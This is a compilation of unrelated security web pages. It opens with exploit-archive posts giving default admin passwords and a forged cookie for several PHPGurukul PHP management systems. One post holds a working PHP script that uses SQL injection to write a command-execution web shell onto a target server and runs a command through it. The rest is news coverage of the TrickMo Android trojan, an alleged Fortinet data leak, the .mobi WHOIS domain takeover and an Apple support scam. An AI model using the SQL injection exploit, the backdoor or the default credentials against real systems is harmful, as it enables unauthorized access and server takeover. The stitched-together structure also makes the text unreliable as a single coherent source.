Car Washing Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Car Washing Management System 1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/car-washing-management-system-using-php-and-mysql/                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/agms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Car Washing Management System 1.0 Insecure Settings

Bus Pass Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Bus Pass Management System 1.0 Insecure Settings Vulnerability                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/bus-pass-management-system-using-php-and-mysql/                                             |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/buspassms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Bus Pass Management System 1.0 Insecure Settings

BP Monitoring Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : BP Monitoring Management System 1.0 Insecure Settings Vulnerability                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/bp-monitoring-management-system-using-php-and-mysql/                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: john@test.com      Password: Test@123[+] http://127.0.0.1/bpmms/edit-family-member.php?fmid=1Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

BP Monitoring Management System 1.0 Insecure Settings

Beauty Parlour and Saloon Management System version 1.1 suffers from an insecure cooking handling vulnerability.

**Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling**

Posted Sep 13, 2024

Authored by indoushka

Beauty Parlour and Saloon Management System version 1.1 suffers from an insecure cooking handling vulnerability.

tags | exploit

SHA-256 | 4c0788f43b5ea94beac369a15563afe012375eb20121975b115510c93def998e

Download | Favorite | View

**Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling**

    ====================================================================================================================================| # Title     : Beauty Parlour & Saloon Management System 1.1 Insecure Cookie Handling Vulnerability                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/beauty-parlour-management-system-using-php-and-mysql/                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The default username is admin & The chosen password is user123[+] use payload : document.cookie = "username=user123; path=/; secure; HttpOnly; SameSite=Lax";[+] Refresh the page http://127.0.0.1/studentms/admin/login.php or go to http://127.0.0.1/studentms/admin/dashboard.php Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,753)
*   Arbitrary (17,058)
*   BBS (2,859)
*   Bypass (1,912)
*   CGI (1,047)
*   Code Execution (7,889)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,422)
*   DoS (25,235)
*   Encryption (2,394)
*   Exploit (54,198)
*   File Inclusion (4,273)
*   File Upload (1,011)
*   Firewall (822)
*   Info Disclosure (2,913)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,270)
*   Local (14,848)
*   Magazine (587)
*   Overflow (13,212)
*   Perl (1,435)
*   PHP (5,262)
*   Proof of Concept (2,406)
*   Protocol (3,749)
*   Python (1,655)
*   Remote (31,853)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,046)
*   Shell (3,303)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,711)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (673)
*   Vulnerability (33,063)
*   Web (10,135)
*   Whitepaper (3,783)
*   x86 (970)
*   XSS (18,289)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,119)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,136)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,775)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,828)
*   UNIX (9,454)
*   UnixWare (188)
*   Windows (6,766)
*   Other

Beauty Parlour And Saloon Management System 1.1 Insecure Cookie Handling

Auto/Taxi Stand Management System version 1.0 suffers from a php code injection vulnerability.

    =============================================================================================================================================| # Title     : Auto/Taxi Stand Management System 1.0 php code injection Vulnerability                                                      || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/auto-taxi-stand-management-system-using-php-and-mysql/                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject php code contains a back door.[+] Line 16 + 19 Set your Target.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php[+] payload :<?php// المكتبات المطلوبةfunction send_request($url, $data) {    $options = [        'http' => [            'header'  => "Content-Type: application/x-www-form-urlencoded\r\n",            'method'  => 'POST',            'content' => http_build_query($data),        ]    ];    $context  = stream_context_create($options);    return file_get_contents($url, false, $context);}// تحديد URL ثابت$url = 'http://localhost/atsms/';// مسار ثابت لرفع الملف$path = 'C:\www\atsms\uploaded.php';$path = str_replace("\\", "\\\\", $path);// حمولة الباب الخلفي$backdoor_payload = '<?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>';// إرسال ملف PHP يحتوي على الباب الخلفي$payload = [    'username' => "admin' union select '" . addslashes($backdoor_payload) . "' into outfile '" . $path . "' -- 'a",    'password' => 'test',    'login' => ''];send_request($url . "/admin/index.php", $payload);echo "[+] PHP backdoor uploaded successfully at $path\n";// تنفيذ ملف PHP المرفوع واختبار الباب الخلفي$response = file_get_contents($url . "uploaded.php?cmd=whoami");echo "[+] Response from the backdoor (executing 'whoami'): \n$response\n";?>Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Auto/Taxi Stand Management System 1.0 PHP Code Injection

Art Gallery Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : Art Gallery Management System 1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/art-gallery-management-system-using-php-and-mysql/                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: john@test.com      Password: Test@123[+] http://127.0.0.1/agms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Art Gallery Management System 1.0 Insecure Settings

Cybersecurity researchers have uncovered a new variant of an Android banking trojan called TrickMo that comes packed with new capabilities to evade analysis and display fake login screens to capture victims' banking credentials.
"The mechanisms include using malformed ZIP files in combination with JSONPacker," Cleafy security researchers Michele Roviello and Alessandro Strino said. "In addition,

Cybersecurity researchers have uncovered a new variant of an Android banking trojan called TrickMo that comes packed with new capabilities to evade analysis and display fake login screens to capture victims' banking credentials.

"The mechanisms include using malformed ZIP files in combination with JSONPacker," Cleafy security researchers Michele Roviello and Alessandro Strino said. "In addition, the application is installed through a dropper app that shares the same anti-analysis mechanisms."

"These features are designed to evade detection and hinder cybersecurity professionals' efforts to analyze and mitigate the malware."

TrickMo, first caught in the wild by CERT-Bund in September 2019, has a history of targeting Android devices, particularly targeting users in Germany to siphon one-time passwords (OTPs) and other two-factor authentication (2FA) codes to facilitate financial fraud.

The mobile-focused malware is assessed to be the work of the now-defunct TrickBot e-crime gang, over time continually improving its obfuscation and anti-analysis features to fly under the radar.

Notable among the features are its ability to record screen activity, log keystrokes, harvest photos and SMS messages, remotely control the infected device to conduct on-device fraud (ODF), and abuse Android's accessibility services API to carry out HTML overlay attacks as well as perform clicks and gestures on the device.

The malicious dropper app discovered by the Italian cybersecurity company masquerades as the Google Chrome web browser that, when launched after installation, urges the victim to update Google Play Services by clicking the Confirm button.

Should the user proceed with the update, an APK file containing the TrickMo payload is downloaded to the device under the guise of "Google Services," following which the user is asked to enable accessibility services for the new app.

"Accessibility services are designed to assist users with disabilities by providing alternative ways to interact with their devices," the researchers said. "However, when exploited by malicious apps like TrickMo, these services can grant extensive control over the device."

"This elevated permission allows TrickMo to perform various malicious actions, such as intercepting SMS messages, handling notifications to intercept or hide authentication codes, and executing HTML overlay attacks to steal user credentials. Additionally, the malware can dismiss keyguards and auto-accept permissions, enabling it to integrate seamlessly into the device's operations."

Furthermore, the abuse of the accessibility services allows the malware to disable crucial security features and system updates, auto-grant permissions at will, and prevent the uninstallation of certain apps.

Cleafy's analysis also uncovered misconfigurations in the command-and-control (C2) server that made it possible to access 12 GB worth of sensitive data exfiltrated from the devices, including credentials and pictures, without requiring any authentication.

The C2 server also hosts the HTML files used in the overlay attacks. These files encompass fake login pages for various services, counting banks such as ATB Mobile and Alpha Bank and cryptocurrency platforms like Binance.

The security lapse not only highlights the operational security (OPSEC) blunder on the part of the threat actors, but also puts the victims' data at risk of exploitation by other threat actors.

The wealth of information exposed from TrickMo's C2 infrastructure could be leveraged to commit identity theft, infiltrate various online accounts, conduct unauthorized fund transfers, and even make fraudulent purchases. Even worse, attackers could hijack the accounts and lock the victims out by resetting their passwords.

"Using personal information and images, the attacker can craft convincing messages that trick victims into divulging even more information or executing malicious actions," the researchers noted.

"Exploiting such comprehensive personal data results in immediate financial and reputational damage and long-term consequences for the victims, making recovery a complex and prolonged process."

The disclosure comes as Google has been plugging the security holes around sideloading to let third-party developers determine if their apps are sideloaded using the Play Integrity API and, if so, require users to download the apps from Google Play in order to continue using them.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

TrickMo Android Trojan Exploits Accessibility Services for On-Device Banking Fraud

A hacker claims to have stolen 440 GB of data from cybersecurity firm Fortinet, exploiting an Azure SharePoint…

A hacker claims to have stolen 440 GB of data from cybersecurity firm Fortinet, exploiting an Azure SharePoint vulnerability. The breach, dubbed “Fortileak,” was revealed on a forum with access credentials shared online.

A hacker using the alias “Fortibitch” has claimed responsibility for leaking 440 GB of data belonging to Fortinet, a prominent cybersecurity firm based in Sunnyvale, California. The hacker stated that the stolen data is now accessible for download via an Amazon S3 bucket, with details of the breach and access credentials shared on the popular underground forum, Breach Forum.

**The Breach: Fortileak**

Dubbed _Fortileak_ by the hacker, the breach allegedly originates from an exposure in Fortinet’s Azure SharePoint instance. In the forum post, the hacker pointed out recent acquisitions by Fortinet, including the Data Loss Prevention (DLP) firm Next DLP and the cloud security company Lacework. They then claimed that Fortinet’s Azure SharePoint had been compromised, allowing for the extraction of the substantial data cache.

The full scope of the compromised data remains unclear, though the hacker emphasized that the breach involves Fortinet’s cloud infrastructure. The hacker provided the following credentials for accessing the alleged stolen data:

Screenshot: Hackread.com

**Ransom Demands and Negotiation Breakdown**

In a further twist, the hacker claimed that Fortinet’s CEO, Ken Xie, walked away from ransom negotiations. In the forum post, the hacker ridiculed Xie, alleging that the CEO refused to engage, stating that he “would rather eat some p\*\*p than pay ransom.” The hacker also questioned why Fortinet had not filed an SEC 8-K form (PDF)—a document required by public companies to disclose major incidents.

The post also contained a mix of taunts and shout-outs to other individuals or groups, which seemed to further underline the hacker’s brash attitude toward the attack and its aftermath.

**Fortinet’s Response**

Hackread.com reached out to Fortinet for an official comment on the breach. A spokesperson for the company confirmed that an unauthorized individual had gained access to a limited number of files stored on a third-party cloud-based shared file drive. These files included data related to a “small” subset of Fortinet customers.

In their statement to Hackread.com, Fortinet reassured stakeholders that there has been no indication of any malicious activity affecting its customers. They emphasized that the company’s operations, products, and services have not been impacted by the breach. Fortinet stated that they have already communicated directly with the affected customers and are continuing to monitor the situation closely.

> _“An individual gained unauthorized access to a limited number of files stored on Fortinet’s instance of a third-party cloud-based shared file drive, which included limited data related to a small number of Fortinet customers, and we have communicated directly with customers as appropriate. To-date there is no indication that this incident has resulted in malicious activity affecting any customers. Fortinet’s operations, products, and services have not been impacted.”_
> 
> Fortinet Spokesperson

This is not the first time Fortinet has faced a cybersecurity incident. Last year, Chinese hackers were reported to be exploiting a zero-day vulnerability in the company’s products. In another instance, hackers were found exploiting a vulnerability in FortiOS, the operating system for Fortinet’s security appliances, to compromise organizations and customers.

Nevertheless, for now, the full extent of the breach remains under investigation, and it is unclear whether the alleged stolen data will be used maliciously or if the ransom negotiations will have any further developments. As more information emerges, both customers and cybersecurity professionals will be watching closely to assess the impact of this incident.

1.  **World’s Leading Cybersecurity Firm Kaspersky Hacked**
2.  **CISA and Fortinet Warns of New FortiOS Zero-Day Flaws**
3.  **X Account of Google Cybersecurity Firm Mandiant Hacked**
4.  **Cybersecurity Firm Hacks Itself, Finds AWS Credentials Leak**
5.  **Hackers dump plain-text login credentials of Fortinet VPN users**

Fortinet Confirms Limited Data Breach After Hacker Leaks 440 GB of Data

Their findings highlight the frailty of some of the mechanisms for establishing trust on the Internet.

Source: Aree\_S via Shutterstock

Security researchers' ability to gain control of a chunk of the Internet's infrastructure for a mere $20 has focused attention on the fragility of the trust and cybersecurity mechanisms that organizations and users rely on daily.

The troubling event began with researchers at watchTowr on a whim looking for remote code execution vulnerabilities in WHOIS clients while at the recent Black Hat USA conference in Las Vegas. In poking around, the researchers discovered that the WHOIS server for the .mobi top level domain (TLD) — for mobile-optimized sites — had migrated a few years ago from "whois.dotmobiregistry.net" to "whois.nic.mobi". After the change, the registration for the original domain (whois.dotmobiregistry.net) expired last December.

**An Accidental Discovery**

A WHOIS server is like a public phone book for the Internet and contains information on the owners of an IP address or website along with lots of other related information. A WHOIS client is a tool that queries for and retrieves information about a specific domain name or IP address from a WHOIS server.

On a lark, the watchTowr researchers spent $20 to register the expired whois.dotmobiregistry.net in the company's name and stick a WHOIS server behind it to see if any WHOIS clients would query it. Their initial presumption was that few, if any, WHOIS clients would still touch the decommissioned server after the migration to the new .mobi authoritative WHOIS server (whois.nic.mobi) a few years ago.

To their surprise — and consternation — watchTowr researchers found over 76,000 unique IP addresses sending queries to their WHOIS server in just a couple hours. In about two days that number had ballooned to over 2.5 million queries from 135,000 unique systems worldwide.

Contrary to their expectations, among those querying watchTowr's WHOIS server were major domain registrars and websites performing WHOIS functions. Also querying watchTowr's WHOIS domain were mail servers for numerous government organizations in the US, Israel, Pakistan, India, the Philippines, a military entity in Sweden, and countless universities worldwide. Troublingly, even some security-related websites, including VirusTotal, queried watchTowr's WHOIS server as if it were the authoritative server for the .mobi TLD.

Had watchTowr been a bad actor, they could have easily abused their status as the owner of whois.dotmobiregistry.net to deliver malicious payloads to anyone querying the server, or to passively monitor email communications and potentially create other mayhem.

"In the wrong hands, owning the domain could enable attackers to 'respond' to queries and inject malicious payloads to exploit vulnerabilities in WHOIS clients," watchTowr's CEO and founder Benjamin Harris said in a FAQ on his company's discovery. From the standpoint of government mail servers reaching out to watchTowr's WHOIS servers, "traffic analysis can be performed to passively observe and infer email communication," he said.

**A Serious Domain Verification Weakness**

But even more troubling than that was watchTowr’s discovery of multiple Certificate Authorities (CA) — including those issuing TLS/SSL certificates for domains such as ‘microsoft.mobi and ‘google.mobi — using watchTowr’s server for domain verification purposes.

"It turns out that a number of TLS/SSL authorities will verify ownership of a domain by parsing WHOIS data for your domain— say watchTowr.mobi — and pulling out email addresses defined as the 'administrative contact'," watchTowr said. "The process is to then send that email address a verification link. Once clicked, the certificate authority is convinced that you control the domain that you are requesting a TLS/SSL cert for, and they will happily mint you a certificate."

In other words, watchTowr could provide its own email address to certificate authorities (CAs) in response to domain ownership queries and obtain TLS/SSL certificates on behalf of other organizations. Once again, contrary to expectations, watchTowr discovered multiple well known CAs — including Trustico, Comodo, GlobalSign, and Sectigo — using WHOIS data for domain verification.

"For 'microsoft.mobi', watchTowr demonstrated that CA GlobalSign would parse responses provided by its WHOIS server and present '\[email protected\]' as an authoritative email address," the security vendor said. "watchTowr's discovery effectively undermines the certificate authority process for the entire .mobi TLD, a process that has been targeted by nation-states overtly for years." The research highlights the trivial loopholes in the Internet's TLS/SSL vital encryption processes and structures and shows why trust in them is misplaced at this stage, the researchers wrote.

Nick France, CTO at Sectigo, says the issue has to do with CAs being allowed to use administrative emails on public WHOIS records for domain names. "However, the researchers found that the .mobi registry had changed their WHOIS server in the past and the 'old' name was now available as a registerable domain name — which they did," France says.

This is only a problem if a CA uses an outdated list of WHOIS server, he says. In that event, a CA's WHOIS query could get directed to an outdated server and any attacker that owns it could send any output in response, including an email address of their choice. "This leads to a failure of the domain verification process and thus mis-issued certificates."

The issue that watchTowr discovered highlights why CAs must keep their systems updated, especially with respect to critical processes like domain control validation, French says. "WHOIS is an old, insecure system — often neglected by researchers and users alike, leaving it primed for the discovery of flaws like this one," he notes.

While it may impact only smaller TLDs like .mobi, as opposed to .com, .net, and .gov, it still demonstrates a serious vulnerability in the domain verification process, he says.

Tim Callan, Sectigo's Chief Experience Officer, adds how the incident highlights a need to update some of the rules around Domain Control Validation (DCV). "We should expect the Certification Authority Browser Forum to move quickly on these changes in order to plug this particular hole."

In the meantime, the nonprofit Internet monitoring entity ShadowServer has sinkholed the dotmobiregistry.net domain and the whois.dotmobiregisry.net hostname and is redirecting all queries to the server to the legitimate WHOIS responsible for .mobi domains. "If you have code/systems still using the expired http://whois.dotmobiregistry.net to make WHOIS queries for the .mobi TLD, please update immediately to use the correct authoritative WHOIS server http://whois.nic.mobi," said Piotr Kijewski, ShadowServer's CEO in an email.

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa and forced to spend the night in jail -- just for doing their pen-testing jobs. Listen now!

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

For Just $20, Researchers Seize Part of Internet Infrastructure

Beware before calling Apple for assistance as scammers are creating malicious ads and fake pages to lure you in.

We’ve uncovered a malicious campaign going after Mac users looking for support or extended warranty from Apple via the AppleCare+ support plans. The perpetrators are buying Google ads to lure in their victims and redirect them to bogus pages hosted on GitHub, the developer and code repository platform owned by Microsoft.

The goal of this scam is to get unsuspecting people on the phone with someone pretending to be working for Apple. From there, fraudulent call center agents will social engineer their victims in order to extract money from them.

In this blog post, we expose the techniques behind this scam and provide mitigation steps to stay away from them. We’d like to thank GitHub for their quick response in taking down the malicious accounts we reported to them.

**Hey Siri, google “Apple phone support”**

While Apple products are designed with simplicity in mind, we’ve all come across an issue at some point that we need assistance with. Google, who reportedly paid Apple $20 billion to be the default search engine, will display results in Safari, along with ads, hence the lucrative partnership.

Those “Sponsored” results can appear at the top or further down the search results page. In the image seen below, a malicious ad appears at the very top, right before Apple’s official phone number. In other cases we encountered, multiple malicious ads were displayed before any legitimate results.

Clicking on one of those will redirect to a fake AppleCare+ customer service page, inviting users to call a 1-800 phone number supposedly belonging to Apple. In reality, in just 2 simple clicks victims are connected with scammers located in call centers overseas.

The fake Apple customer service pages are hosted on Microsoft’s GitHub source code repository as standalone HTML templates using Apple’s branding. Scammers are creating several accounts on GitHub with one or multiple repositories with the same fraudulent _index.html_ template:

During an active campaign, they can easily swap phone numbers in case one got reported and blocked. In fact, we saw scammers do just that thanks to GitHub’s commit history:

There is also an interesting piece of code within the page (autoDial) that automatically pops up the phone dialog menu. This ensures that victims have one less thing to click on to get connected with a scammer impersonating Apple:

**Risks and mitigations**

This particular scheme is exceptionally easy to fall for due to the combination of malicious Google ads and lookalike pages. Scammers are preying on unsuspecting users to trust that they are real Apple service agents and that it’s okay to give them personal information.

The biggest risk to consumers is being defrauded for hundreds, and often thousands of dollars. Scammers typically instruct victims to withdraw money from their bank account and send it to them, in various ways.

In some cases we investigated this year, fraudsters will ask for the victim’s name, address, social security number and banking details. With that information, they can easily blackmail them directly or share their profile with other scammers who will pretend to help from the original incident.

We advise users to be extremely cautious when looking for phone or online support related to any of the most popular brands. Microsoft is usually highly targeted by scammers due to its dominance in the computer market share. Keep in mind that whenever you click on a sponsored result or ad, you are taking a chance of being redirected to a malicious site.

If you want to find out what personal data of yours has been exposed online, you can use our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

Tag

#google